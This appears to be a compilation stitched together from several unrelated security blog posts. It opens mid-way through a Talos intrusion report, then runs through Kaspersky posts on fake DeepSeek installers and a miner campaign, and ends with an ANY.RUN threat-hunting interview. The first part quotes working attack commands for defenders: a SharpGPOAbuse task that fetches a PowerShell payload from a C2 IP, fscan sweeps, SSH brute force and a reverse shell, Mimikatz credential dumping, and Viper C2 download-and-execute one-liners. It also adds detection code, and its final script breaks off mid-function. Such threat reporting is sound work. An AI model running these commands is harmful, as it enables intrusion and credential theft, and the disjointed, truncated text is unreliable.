SharpGPOAbuse.exe --AddComputerTask --TaskName "update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguements "/c powershell.exe -nop -w hidden -c "IEX ((new-object new.webclient).downloadstring('http[://]38[.]14[.]255[.]23[:]8000/payload.ps1'))"" --GPOName "Default Server Policy" 

The attacker runs “fscan” to scan the local subnet of the victim’s network with a range of 256 IP addresses to discover other machines, ports, and services in the sub-network.  

fscan.exe -h 192[.]168[.]1[.]1/24 

The attacker locates SSH services that accept a public key, automating SSH brute-forcing by providing the public key (id_rsa.pub) to gain unauthorized access to SSH-enabled machines. They also attempt to brute-force SSH credentials for services running on a non-default port (2222). 

fscan.exe -h 192[.]168[.]1[.]1/24 -rf id_rsa.pub 
fscan.exe -h 192[.]168[.]1[.]1/24 -m ssh -p 2222 

Using the fscan utility, the attacker opens a reverse shell, enabling the attacker to execute commands on victim machines in the subnet while connecting back to their server on port 6666, and executes the “whoami” command on the accessible machines. 

fscan.exe -h 192[.]168[.]1[.]1/24 -rs 192.168.1.1:6666 
fscan.exe -h 192[.]168[.]1[.]1/24 -c whoami 
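
An added example, not Talos code, of detecting the fscan activity above from network flow records rather than from the endpoint: a single source touching many distinct hosts in a /24 within a short window (the sweep), and repeated connections from one source to one host on an SSH port, including the non-default port 2222 (the brute force). The flow records and thresholds are constructed and illustrative.

```python
"""Spot a subnet sweep and an SSH password-guessing burst like the fscan runs above.

Added example, not Talos code. Input is a constructed list of flow records in
a NetFlow-like tuple form (timestamp, source, destination, destination port,
protocol); thresholds are illustrative and should be tuned to the network.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: int      # epoch seconds of the first packet
    src: str
    dst: str
    dport: int
    proto: str


SWEEP_MIN_HOSTS = 20      # distinct destinations from one source ...
SWEEP_WINDOW_SEC = 60     # ... inside this many seconds
SSH_PORTS = {22, 2222}    # the write-up shows guessing on 2222 as well as the default


def detect_sweeps(flows):
    """Sources that contacted >= SWEEP_MIN_HOSTS distinct hosts within SWEEP_WINDOW_SEC.

    Returns {src: {"hosts": count, "ports": sorted list of ports touched}} using the
    densest window seen for each source.
    """
    by_src = defaultdict(list)
    for f in flows:
        by_src[f.src].append(f)
    findings = {}
    for src, fl in by_src.items():
        fl.sort(key=lambda f: f.ts)
        best_hosts, best_ports = set(), set()
        start = 0
        for end in range(len(fl)):                # sliding time window over sorted flows
            while fl[end].ts - fl[start].ts > SWEEP_WINDOW_SEC:
                start += 1
            window = fl[start:end + 1]
            hosts = {f.dst for f in window}
            if len(hosts) > len(best_hosts):
                best_hosts, best_ports = hosts, {f.dport for f in window}
        if len(best_hosts) >= SWEEP_MIN_HOSTS:
            findings[src] = {"hosts": len(best_hosts), "ports": sorted(best_ports)}
    return findings


def detect_ssh_bruteforce(flows, min_attempts=10):
    """(src, dst, port) triples with >= min_attempts TCP flows to an SSH port."""
    counts = Counter((f.src, f.dst, f.dport) for f in flows if f.proto == "tcp" and f.dport in SSH_PORTS)
    return {key: n for key, n in counts.items() if n >= min_attempts}


def build_sample():
    """Constructed flows: one scanning host, one normal workstation."""
    flows = []
    # 192.168.1.50 sweeps the /24 on three ports, one host per second
    for i in range(60):
        for port in (22, 445, 3389):
            flows.append(Flow(1000 + i, "192.168.1.50", f"192.168.1.{i + 1}", port, "tcp"))
    # ... then hammers one host's SSH daemon on port 2222
    for j in range(15):
        flows.append(Flow(2000 + j, "192.168.1.50", "192.168.1.10", 2222, "tcp"))
    # a workstation doing ordinary HTTPS to three servers
    for j, dst in enumerate(("192.168.1.100", "192.168.1.101", "192.168.1.102")):
        flows.append(Flow(1500 + j, "192.168.1.7", dst, 443, "tcp"))
    return flows


SAMPLE_FLOWS = build_sample()

if __name__ == "__main__":
    print(detect_sweeps(SAMPLE_FLOWS))
    print(detect_ssh_bruteforce(SAMPLE_FLOWS))
```

Because a sweep produces one flow per destination, the brute-force counter does not fire on it, and the sweep detector ignores the brute force because it touches a single host; the two signals are complementary and together describe the two fscan phases above.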

Credential access and exfiltration  

ATT&CK Technique: OS Credential Dumping (T1003) 

ATT&CK Technique: OS Credential Dumping: LSASS Memory (T1003.001) 

ATT&CK Technique: Exfiltration Over C2 Channel (T1041) 

The attacker executes Mimikatz commands to gather plaintext passwords and NTLM hashes from memory on the victim’s machine. 

sekurlsa::logonpasswords 

Attacker’s tradecraft has similarities with a hacker group 

We observed the attacker exploiting the weakness in the vulnerable systems to gain initial access and executing Cobalt Strike reverse HTTP beacons to maintain remote access to the victim machine. They used the Cobalt Strike kit “TaoWu”, which has several plugins, including sharpTask.exe, SharpHide.exe, SharpStay.exe, Ladon.exe, and fscan, as well as Mimikatz, for post-exploitation activities.  

Similar techniques were previously observed being used by the hacker group called “Dark Cloud Shield” or “You Dun” in their attacks in 2024, as reported by the DFIR Report.  

However, we are not attributing the attacks to the “You Dun” group, as we did not observe any further activities after harvesting the victim machine credentials in the current intrusion. 

Potential abuse of adversarial tools and frameworks 

We discovered that the attacker has used two C2 servers with IP addresses 38[.]14[.]255[.]23 and 118[.]31[.]18[.]77, hosted on Alibaba Cloud and running the Cobalt Strike team server. During our research period, we noticed, based on our OSINT research artefacts, that the attacker had left directory listings enabled and the root folder of the C2 server 38[.]14[.]255[.]23 accessible from the internet.  

We found PowerShell scripts, Cobalt Strike beacon executables, and exploit programs, along with the attacker’s command execution history logs, in the C2 server’s exposed folder. Our further analysis of the contents of the exposed folder showed that the attacker had downloaded and executed a pre-configured installer shell script called “LinuxEnvConfig.sh” from the repository “yijingsec” on the Gitee platform (hxxps[://]gitee[.]com/yijingsec/), a Chinese Git-based platform like GitHub. The author describes the repository as belonging to a network security talent training service provider called “Yijing Network Security Academy,” which indicates that the attacker is likely abusing a legitimate resource for malicious intent. 

The shell script “LinuxEnvConfig.sh” appears to be designed to configure foundational environments for Ubuntu, Debian, and Kali Linux systems and to facilitate the setup of various publicly available offensive security frameworks and tools, including Vulfocus, Asset Reconnaissance Lighthouse (ARL), Viper C2, Starkiller, BeEF, and Blue-Lotus, which are packaged and staged as Docker containers in the container registry “registry[.]cn-shanghai[.]aliyuncs[.]com”, an Alibaba Cloud Container Registry (ACR) located in the Shanghai, China, region.   

We also found that the shellscript, when executed by a user, modifies the machine’s DNS settings, pointing to a specific DNS server with the IP address 114[.]114[.]114[.]114, which is a Chinese 114DNS service and is not used very often in other regions. 

Menu-driven interface of the LinuxEnvConfig.

We have continued to see various threat actors abusing publicly available tools, such as Cobalt Strike, Metasploit, ARL, Vulfocus, and PowerShell Empire, for their malicious intentions. However, some of the tools and frameworks that the shell script “LinuxEnvConfig” deploys, such as Blue-Lotus, BeEF, and Viper C2, have not often been seen in an attacker’s possession, so we document them further in this post to give an overview of the capabilities and functionality an attacker could leverage by abusing them.  

Blue-Lotus 

Blue-Lotus is a JavaScript webshell cross-site scripting attack framework. Blue-Lotus is Docker-based and was developed by Firesun[.]me and the Blue Lotus team, a cybersecurity technology competition and research team from Tsinghua University. 

Blue-Lotus’ administrative panel is in Chinese, with an XSS receiving dashboard that displays the connection details of the victim machine, including the IP address and browser. 

Blue-Lotus tool control panel. 

Blue-Lotus has a payload generation panel where the user can generate the JavaScript webshell payload using the default JavaScript template from the tool’s database. An attacker using the framework can generate the webshell and instrument it in their attacks to perform the following tasks: 

  • Cross-site scripting (XSS). 
  • Screen capture of remote machine.  
  • Get the reverse shell access to the remote machine.  
  • Steal the browser cookies. 
  • Creation of user ID and passwords in the Content Management System (CMS).  

Blue-Lotus payload generation panel. 

BeEF

BeEF is a publicly available browser exploitation framework that an attacker can hook into one or more web browsers on the victim machine to execute commands within the browser context. BeEF has command modules consisting of JavaScript code that perform the following tasks: 

  • Check if the links, forms, and URI paths of the web page in a hooked browser are vulnerable to XSS. 
  • Submit arbitrary requests on behalf of the hooked browser. 
  • Interact with the host on the local network of the hooked browser. 
  • Send commands to the victim systems through Web Real-Time Communication (WebRTC) caller.  

BeEF tool dashboard. 

Viper C2 

Viper C2 is a modular framework with multiple plugins and scripts that define its extensive functionality. The C2 has built-in integration with the Metasploit Framework (MSF) Meterpreter console and scripts.  

Viper C2 has functionalities, such as: 

  • Antivirus software bypass.  
  • Intranet tunnel. 
  • File management of the remote machine, such as upload and execute other executable files. 
  • Remote command execution on compromised host. 
  • Generate payloads of Meterpreter reverse shell in multiple forms that work on Windows, Linux, and MacOS. 
  • Display the network topology of the compromised network. 

Viper C2 control panel. 

Viper C2 has the capability of generating the payload of Meterpreter HTTP and TCP reverse shell for multiple platforms, including Windows, Linux, MacOS, Android, Java, and Python. The payloads can be generated in different formats, such as EXE, DLL, ELF, ELF-SO, MSBuild, Macho, PowerShell script, PowerShell command, Python script, and HTA and VBA scripts.  

Viper C2 payload generation panel. 

Generated payloads are delivered to victims using the Viper C2 web delivery commands, which the user can generate together with the delivery URL and instrument in their attacks.  

Viper C2 web delivery panel. 

We compiled some of the command formats generated by Viper C2 to assist defenders and threat hunters in hunting for threats related to Viper C2, shown below: 

Windows: 

regsvr32 /s /n /u /i:hxxp[://]C2 server:port/SWLonxen.sct scrobj.dll 

Linux: 

wget -qO lYoSQUgn --no-check-certificate hxxp[://]C2 server:port/oegqPVin; chmod +x lYoSQUgn; ./lYoSQUgn& disown 

PHP: 

php -d allow_url_fopen=true -r "eval(file_get_contents(' :/bIBNfnlE', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false] ])));" 

Python: 

python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen(' :/wXAOAUIK', context=ssl._create_unverified_context());exec(r.read());" 

PowerShell: 

[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
$pbFU=new-object net.webclient; 
if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null)
{$pbFU.proxy=[Net.WebRequest]::GetSystemWebProxy(); 
$pbFU.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;}; 
IEX ((new-object Net.WebClient).DownloadString('C2 server:port/WyeslpUl/KaptrNuHdqhM')); 
IEX ((new-object Net.WebClient).DownloadString('C2 server:port'); 

Linux download and execute: 

wget -O 1737698200.elf --no-check-certificate hxxps[://]C2 server:port/api/v1/d/?en=/6trTQMIGpJgIMksMielQg%3D%3D && chmod 755 1737698200.elf && ./1737698200.elf 
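
Turning the command formats above into hunting rules, as an added example (not Talos code): each regular expression generalises one of the quoted one-liners by matching its fixed structure while letting the random file names and the C2 host vary. The sample command lines are constructed, with 203.0.113.10 (a documentation address) standing in for a C2 server, and the PowerShell rule also matches the Invoke-Expression/DownloadString form used for initial access earlier in the post.

```python
"""Hunting rules for the Viper C2 web-delivery one-liners listed above.

Added example, not Talos code. The expressions generalise the command formats
quoted in the post: the random file names and the C2 host change per payload,
so the rules key on the fixed structure around them. The command lines are
constructed (203.0.113.10 is a documentation address standing in for a C2).
"""
import re

RULES = {
    "viper-regsvr32-sct": re.compile(
        r'\bregsvr32(?:\.exe)?\s+/s\s+/n\s+/u\s+/i:https?://\S+\.sct\s+scrobj\.dll', re.I),
    "viper-wget-chmod-exec": re.compile(   # the same random name is reused three times
        r'\bwget\s+-qO\s+(\S+)\s+--no-check-certificate\s+https?://\S+;\s*chmod\s+\+x\s+\1;\s*\./\1', re.I),
    "viper-php-eval-url": re.compile(
        r'\bphp\s+-d\s+allow_url_fopen=true\s+-r\s+"eval\(file_get_contents\(', re.I),
    "viper-python-urlopen-exec": re.compile(
        r'\bpython\S*\s+-c\s+".*urlopen\(.*_create_unverified_context\(\).*exec\(r\.read\(\)\)', re.I),
    "powershell-iex-downloadstring": re.compile(   # generic; also hits the initial-access PowerShell
        r'(?:IEX|Invoke-Expression)\s*\(\(?new-object\s+(?:System\.)?Net\.WebClient\)\.DownloadString\(', re.I),
    "viper-elf-api-download": re.compile(
        r'\bwget\s+-O\s+\d+\.elf\s+--no-check-certificate\s+https?://\S+/api/v1/d/\?en=\S+\s*&&\s*chmod\s+755\b', re.I),
}


def match_rules(command_line):
    """Names of every rule that fires on one command line, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(command_line)]


def hunt(command_lines):
    """(command, [matching rule names]) for every command that trips a rule."""
    hits = []
    for cmd in command_lines:
        names = match_rules(cmd)
        if names:
            hits.append((cmd, names))
    return hits


# Constructed sample: six lines shaped like the formats above, two benign ones.
SAMPLE_COMMAND_LINES = [
    "regsvr32 /s /n /u /i:http://203.0.113.10:8443/SWLonxen.sct scrobj.dll",
    "wget -qO lYoSQUgn --no-check-certificate http://203.0.113.10:8443/oegqPVin; chmod +x lYoSQUgn; ./lYoSQUgn& disown",
    "php -d allow_url_fopen=true -r \"eval(file_get_contents('http://203.0.113.10:8443/bIBNfnlE', false, "
    "stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));\"",
    "python -c \"import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],"
    "fromlist=('urlopen',));r=u.urlopen('http://203.0.113.10:8443/wXAOAUIK', context=ssl._create_unverified_context());exec(r.read());\"",
    "powershell -nop -w hidden -c \"IEX ((new-object Net.WebClient).DownloadString('http://203.0.113.10:8443/WyeslpUl/KaptrNuHdqhM'))\"",
    "wget -O 1737698200.elf --no-check-certificate https://203.0.113.10:8443/api/v1/d/?en=/6trTQMIGpJgIMksMielQg%3D%3D && chmod 755 1737698200.elf && ./1737698200.elf",
    "wget -O index.html https://www.example.com/",                       # benign download
    "regsvr32 /s \"C:\\Program Files\\Vendor\\component.dll\"",           # benign registration
]

if __name__ == "__main__":
    for cmd, names in hunt(SAMPLE_COMMAND_LINES):
        print(names, "<-", cmd[:60])
```

The Viper-specific rules are narrow enough to run against raw process-creation or shell-history data with few false positives; the PowerShell rule is intentionally broad, since the IEX/DownloadString pattern is shared by many loaders, and is better treated as a triage signal than as a Viper attribution.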

Coverage 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

Snort SIDs for this threat: 

Snort 2: 64632, 64633, 64630, 64631. 

Snort 3: 301157, 301156. 

Indicators of Compromise 

IOCs for this threat can be found in our GitHub repository here. 

Cisco Talos Blog – Read More

Attackers distributing Trojans disguised as DeepSeek or Grok clients for Windows | Kaspersky official blog

In early 2025, the Chinese chatbot, DeepSeek, burst onto the AI scene. It provoked much comment and controversy across the globe: we could hardly fail to spot the similarity of its logo to our own, comparisons with ChatGPT were abundant, and in Italy, South Korea, Australia, and other countries, DeepSeek was blocked altogether. The hype was — and remains — intense, including among cybercriminals.

We’ve discovered several groups of sites mimicking the official chatbot website and distributing malicious code under the guise of what appears to be a legitimate client. To find out exactly how these cybervillains operate, and how to use AI safely, read on…

Malicious scripts and geofencing

Several malware distribution schemes were detected, all of which had the use of fake DeepSeek websites as the common denominator. The difference lies in what was distributed through these sites and how. This post thoroughly explores one of these schemes; for details on the others, see our full report on Securelist.

What would you think if you landed on a website with the domain deepseek-pc-ai[.]com or deepseek-ai-soft[.]com? You’d probably assume you could find there some DeepSeek-related software. And what kind of software might that be? A DeepSeek client, of course! And indeed, you’ll quickly see the bright Download and slightly duller Start Now buttons that greet visitors to the site.

Fake DeepSeek web page

Whichever of these buttons you click, an installer starts downloading. But there’s a catch: once initiated, instead of installing DeepSeek, the installer accesses malicious URLs and manipulates scripts to activate the SSH service in Windows and configure it to work with the attackers’ keys. This enables them to remotely connect to the victim’s computer, and the victim doesn’t even get a DeepSeek Windows client as consolation… which, by the way, doesn’t exist.

Interestingly, the fake sites use geofencing — restricting access based on the region of the IP address. For example, users from Russia on these domains saw a simple stub site with empty texts about DeepSeek — most likely generated by DeepSeek itself or a different large language model. Visitors from other countries, however, were taken to the malicious site distributing the fake client.

A million views on X

The main vector for distributing links to the malicious URLs was posts on the social network X (formerly Twitter). One of the most popular posts (now deleted) was published from the account of Australian startup Lumina Vista, which, open sources say, has no more than 10 employees. The company’s account itself is in its infancy: it only got the coveted blue check-mark in February 2025, and boasts just a dozen posts and fewer than 100 subscribers. Yet the post promoting the fake DeepSeek site garnered 1.2 million views and more than 100 reposts. A bit fishy? We investigated the accounts that reposted it and concluded that they could be bots, since all use the same naming convention and identifiers in the bio section. Incidentally, it’s quite possible that Lumina Vista’s account was simply hacked and used for paid promotion of the attackers’ ad post.

1.2 million views in a near-empty account? Smells like paid promotion

In the comments, some users pointed out that the link leads to a malicious site, but they were in the minority — the rest were simply expressing views about DeepSeek, Grok, and ChatGPT. However, none of the commenters noted the obvious: DeepSeek has no native client for Windows, and you can only access it in a browser. You can also run DeepSeek locally but that requires specialized software.

How to use AI safely

At present, it’s not easy to assess the scale of this and other malicious schemes involving fake DeepSeek pages. But one thing is for certain: these campaigns are massive and not targeted at specific users. Yet they’re developing very quickly: soon after the announcement of Grok-3, attackers began offering to download its client both from the domain v3-grok[.]com, and from… v3-deepseek[.]com! Indeed, Grok, DeepSeek – what’s the difference?…

Without reliable protection, any AI enthusiast is at risk. That’s why it’s vital to follow the safety rules and recommendations when using AI.

  • Check the URLs of websites you visit. Especially when it’s something new, popular, and easy to spoof.
  • Filter sensitive data. Remember that what you write to a chatbot could be used against you: as with other cloud services, data can leak due to security flaws or account hacking.
  • Protect your devices. Check out the reviews and choose the best solution for you that will spot phishing sites and guard against downloading malware.
  • Limit the use of third-party plugins. Every add-on app creates new threats. Special monitoring is required for execution plug-ins that can, for example, run malicious code to buy a plane ticket at your expense.

If you’re seriously interested in neural networks and want to learn how to use them safely, check out these posts:

Kaspersky official blog – Read More

Cybercriminals are distributing a miner disguised as a restriction-bypassing tool

Over the past six months, Windows Packet Divert drivers for intercepting and modifying network traffic on Windows systems have become popular in Russia. From August to January 2024, we noted that detections of these drivers almost doubled. The main reason? These drivers are being used in tools designed to bypass restrictions for accessing foreign resources.

This surge in popularity hasn’t gone unnoticed by cybercriminals. They’re actively distributing malware disguised as bypassing tools — and they’re doing it by blackmailing bloggers. So, every time you watch a video titled something like “How to bypass restrictions…”, be especially cautious — even the most reputable content creators might unknowingly be spreading stealers, miners, and other malware.

How cybercriminals exploit unsuspecting users — and where bloggers fit into the picture — is what we’ll explore in this article.

Hackers disguised as honest developers

There are plenty of software solutions designed to bypass restricted access to foreign platforms, but they all have one thing in common — they’re created by small-time developers. Such programs spread organically: an enthusiast writes some code, shares it with friends, makes a video about it, and voilà — yesterday’s unknown programmer becomes a “people’s hero”. His GitHub repository is starred tens of thousands of times, and people thank him for restoring access to their favorite online resources. We recently wrote about one such case where cybercriminals boosted GitHub repositories containing malware.

There may be dozens or even hundreds of such enthusiasts — but who are they, and can they be trusted? These are key questions both current and potential users of these programs should be asking. A major red flag is when these developers recommend disabling antivirus protection. Disabling protection to voluntarily give a potential hacker access to your device? That’s a risky move.

Of course, behind the mask of a people’s hero might be a hacker looking for profit. An unprotected device is vulnerable to malware families like NJRat, XWorm, Phemedrone, and DCRat, which have been commonly spread alongside such bypassing software.

Where do bloggers fit in?

We’ve identified an active miner distribution campaign that has claimed at least two thousand victims in Russia. One of the infection sources was a YouTube channel with 60,000 subscribers. The blogger uploaded several videos on bypassing restrictions, with a link to a malicious archive in the description. These videos accumulated over 400,000 views in total. Later, the channel owner deleted the link, leaving this note: “Download the file here: (program does not work)”. Originally, the link led to the fraudulent site gitrok[.]com, where the infected archive was hosted. According to the site’s counter, at the time of our study the bypassing tool had been downloaded at least 40,000 times.

Don’t rush to put all the blame on the bloggers — in this case, they were simply following the orders of cybercriminals, unaware of what was really going on. Here’s how it works. First, the criminals file a complaint against a video about such a restriction-bypassing tool, pretending to be the software’s developers. Then they contact the video creator and persuade them to upload a new video, this time containing a link to their malicious website — claiming that this is now the only official download page. Of course, the bloggers have no idea the site is distributing malware — specifically, an archive containing a miner. And for those who’ve already uploaded three or more videos on the topic, refusal is not an option. The hackers threaten to file multiple complaints, and if there are three or more, the channel would be deleted.

In addition, the criminals spread their malware and installation guides through other Telegram and YouTube channels. Most of these have been deleted — but there’s nothing to stop them from creating new ones.

What about the miner?

The malware in question was a sample of SilentCryptoMiner, which we covered in October 2024. It’s a stealthy miner based on XMRig, another open-source mining tool. SilentCryptoMiner supports mining of multiple popular cryptocurrencies, including ETH, ETC, XMR, RTM, and others. The malware stops mining upon detecting certain processes, the list of which the criminals can provide remotely to evade detection. That makes it nearly impossible to detect without reliable protection.

For more about the malicious archive and how it persists in the system, check our post on Securelist.

How to protect yourself from miners

  • Ensure that all personal devices have trusted protection to safeguard against miners and other malware.
  • Avoid downloading programs from obscure or little-known sources. Stick to official platforms, but remember — malware can creep into them too.
  • Keep in mind that even the most reputable bloggers can unknowingly spread malware, including miners and stealers.

Here are some relevant articles you can read to learn more about miners and their dangers:

  • Mario Forever, malware too: a free game with a miner and Trojans inside
  • XMRig Miner as a New Year’s gift
  • Prices down, miners up

How Transport Company Gets Real-Time IOC and IOB Updates on Active Cyber Attacks 

How can security teams effectively monitor evolving attacks and stay ahead of constantly shifting attacker infrastructure? We spoke with a chief information security officer at a transport company about how they use subscriptions to Search Updates in Threat Intelligence Lookup to tackle this challenge. 

Here’s what we learned. 

Company Info 

Without getting into any specifics, our company operates in the transportation sector, managing logistics across North America, Latin America, and Europe. Right now, the IT security team is at 30 professionals, and as the CISO I’m responsible for overseeing strategic planning, risk management, and operations. Speaking of our use of ANY.RUN’s products, we currently have licenses for both the Interactive Sandbox and TI Lookup.

What is Threat Intelligence Lookup

TI Lookup from ANY.RUN provides a searchable database of over 40 types of indicators of compromise, attack, and behavior. New data is extracted from thousands of public malware and phishing samples analyzed in ANY.RUN’s Interactive Sandbox every day.

Since all threats are executed in virtual machines, ANY.RUN takes a comprehensive snapshot of the activities recorded during analysis, from network traffic and file paths to registry modifications and mutexes.

Key Security Challenges Faced 

I’d say the entire transportation industry rests on email correspondence. Our company, despite being no match for giants like DHL, still has thousands of clients, contractors, and suppliers that we need to communicate with daily. Naturally, even a small email security slip-up, like exposing a few messages, could create major problems across the board. And attackers know this, too. 

That’s why we pour a good chunk of the team’s resources into threat hunting and ensuring we have a grasp of the current threat landscape. We’re constantly monitoring recent attacks, phishing scams, malware campaigns, new CVEs, anything that may somehow be of concern to us. Of course, we can’t gobble up intel on every single threat out there, so we narrow it down to what’s relevant for our industry, and some of the core clients’ industries. 

Where TI Lookup Fits in the Threat Hunting Strategy 

Like any good security setup, we break ours down into areas. TI Lookup adds value pretty much evenly across all of them, from checking indicators as part of triage to discovering threat context in incident response.  

Yet, if we’re talking about threat hunting, we subscribe to Search Updates in TI Lookup to keep up with the changes in ongoing cyber attacks and automate the collection of new indicators of compromise (IOCs) and threat samples. Let me explain how it works. 

Search Updates in TI Lookup 

TI Lookup users can subscribe to custom search queries to receive timely updates on relevant Indicators of Compromise (IOCs), Indicators of Attack (IOAs), and Indicators of Behavior (IOBs) belonging to the threats of their interest. 

Our threat hunting team is tasked with:  

  • Monitoring the current threat landscape 
  • Gathering data on the threats that are relevant to us 
  • Converting the data into actionable signatures and detection rules 

There are several sources for such data, with publicly available research and reports published by other companies being the most common one. The problem here is that attackers constantly shift infrastructure – C2 servers might cycle IPs every 48 hours. So, relying on the indicators we find in public reports can do only so much. And that is precisely the detection gap that Search Updates in TI Lookup help to bridge. 

TI Lookup lets users receive result updates on queries of their interest 

Subscribing to Search Updates in TI Lookup allows us to use more stable indicators of behavior (IOBs) to track all the latest changes in specific attacks and see if they are still ongoing. IOBs are things like the tools used by attackers, the kill chain techniques, and infection traces on the system such as created directories, file names and types, etc. These are things that do not tend to expire as fast as attackers’ short-lived network infrastructure or file hashes. 

Query subscriptions are displayed in the left-side menu with the number of new results next to them 

Essentially, with TI Lookup, we can put several IOBs related to a single attack together and use them in a search query to get notified about the latest samples and IOCs, which the threat hunting team can process and turn into detection rules. 

The result is that we can follow active threats that may potentially target our company almost in real time because TI Lookup is updated every few hours with fresh data. 

Some of the Use Cases for Search Updates 

Our current collection of query subscriptions is well beyond a hundred entries. I will try to give you a few general types of threats that we tend to add to it and some of the examples.  

Geo-Targeted Threats  

While our HQ is in the United States, we have several local offices, which also become extensively targeted with cyber attacks. Search Updates make it easier for us to track several types of threats occurring in a specific country. 

For example, we make sure to check for new samples of email-distributed infostealers in Colombia: 

submissionCountry:"co" AND threatName:"stealer" AND filePath:".eml" OR filePath:".msg"

TI Lookup displays the latest public sandbox analyses featuring infostealers together with .msg and .eml files 

For this query, we get several updates almost every week. 

One of the samples returned by TI Lookup involved AsyncRAT 

We check the new samples and see if they have anything of value and if so, use the indicators extracted by the sandbox to make signatures to scan the company’s infrastructure for any matching threats. 

Common Vulnerabilities and Exposures (CVEs) 

Another top concern on any threat hunters’ list is CVEs, both old and new. One of the recent examples is CVE-2025-21298, the vulnerability where simply previewing a malicious .rtf document in Outlook leads to remote code execution and system compromise. 

As soon as we learned about it, we made sure to go to TI Lookup and sign up for a query that would provide us with relevant samples in case any attackers decided to abuse this vulnerability. 

In the query, we combined the file type (rtf) with Outlook, used the attc-doc (document attachment) tag, and excluded pdfs:  

fileEventPath:"rtf$" AND commandLine:"outlook.exe" AND threatName:"attc-doc" AND NOT threatName:"attc-pdf"

The Events tab in TI Lookup provides a list of command line logs recorded across relevant sandbox sessions 

As a result, we now can minimize the manual research on this threat and in case an actual attack with this CVE is uploaded to TI Lookup, we’ll be notified about it. 

Another thing that I think is worth mentioning here is that this CVE is a great example of how flexible TI Lookup can be. Despite not having a specific tag for this threat, we were able to make up for that by using the big selection of search parameters. 

Credential-Theft Attacks  

Phishing is by far the top threat our company faces, and one of its most common types is fake credential-stealing forms. 

There is a campaign that has been going for a while, where attackers send emails that contain links to fake Microsoft 365 pages. The catch is that the malicious domain names are designed to masquerade as legit Microsoft ones. One of the standout things here is the use of “0” and “o” before “365”. Needless to say, the Search Updates feature does a great job letting us know about the new domains and actual examples of these attacks. 

domainName:"o365." OR domainName:".o365" OR domainName:"0365." OR domainName:".0365"

TI Lookup lists all the matching domains found across relevant sandbox sessions

The team collects new domains and email samples and improves detection of any possible phishing attempts against our own infrastructure. 


Search Updates Hacks 

One thing that’s not related to Query Subscriptions per se but is still of huge help is wildcards. They really add flexibility to the searches, so we can set up queries to be more specific or more general, depending on the indicators we use for a threat. 

Just last week, we subscribed to a query for a new campaign where attackers use website addresses that start with “google.com” but then have random strings of characters afterwards. 

To get the newest variants of these domains, we added the “?” wildcard to the query – which stands for any single character. We used four question marks to account for the random part of the domain. 

domainName:"google.com.????"

Each of the domains can be explored further in the sandbox sessions where they were logged 

Search Updates let us know every time a matching fake domain is added to TI Lookup’s database. 
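The two domain patterns described above (the "o365"/"0365" look-alikes and the "google.com.????" prefix trick) can also be checked offline once the domains have been collected. The following is an added example, not ANY.RUN's code or the interviewee's: it extracts the registrable domain with a deliberately tiny stand-in for the Public Suffix List, flags brand names embedded as left-hand labels, and flags "o365"-style labels on domains Microsoft does not own; the suffix set, brand list, allowlist and sample hosts are all constructed.

```python
import re

# Assumption: a tiny stand-in for the Public Suffix List; real code should load the
# full list. Only the suffixes needed for the constructed sample are included.
PUBLIC_SUFFIXES = {"com", "net", "org", "xyz", "top", "co.uk"}

# Brands whose names get embedded as left-hand labels (assumption: your own watch list).
BRANDS = {"google.com", "microsoft.com"}

# Registrable domains allowed to carry an "o365" label: Microsoft's own, plus a
# hypothetical internal host an organisation might allowlist.
MS_OWNED = {"microsoft.com", "microsoftonline.com", "office.com"}
ALLOWLIST = {"o365.example-corp.com"}

# The query terms o365. / .o365 / 0365. / .0365 as one regex: an 'o365'-like
# token at the start or end of a label.
MS365_LABEL = re.compile(r"(?:^|\.)[o0]365|[o0]365(?:\.|$)")


def registrable_domain(host):
    """Return the registrable domain (eTLD+1), e.g. 'a1b2.xyz' for 'google.com.a1b2.xyz'."""
    labels = host.lower().strip(".").split(".")
    for n in (2, 1):                 # longest matching public suffix first
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-(n + 1):])
    return None


def check_domain(host):
    """Return the reasons a host looks like an impersonation; an empty list means clean."""
    host = host.lower().strip(".")
    if host in ALLOWLIST:
        return []
    reg = registrable_domain(host)
    if reg is None:
        return ["no recognised public suffix"]
    reasons = []
    # Rule 1: a brand's full name appears as labels inside a domain registered by
    # someone else (the 'google.com.????' pattern). A genuine brand host ends with the brand.
    for brand in sorted(BRANDS):
        if host != brand and not host.endswith("." + brand) and f".{brand}." in f".{host}.":
            reasons.append(f"'{brand}' embedded in unrelated domain '{reg}'")
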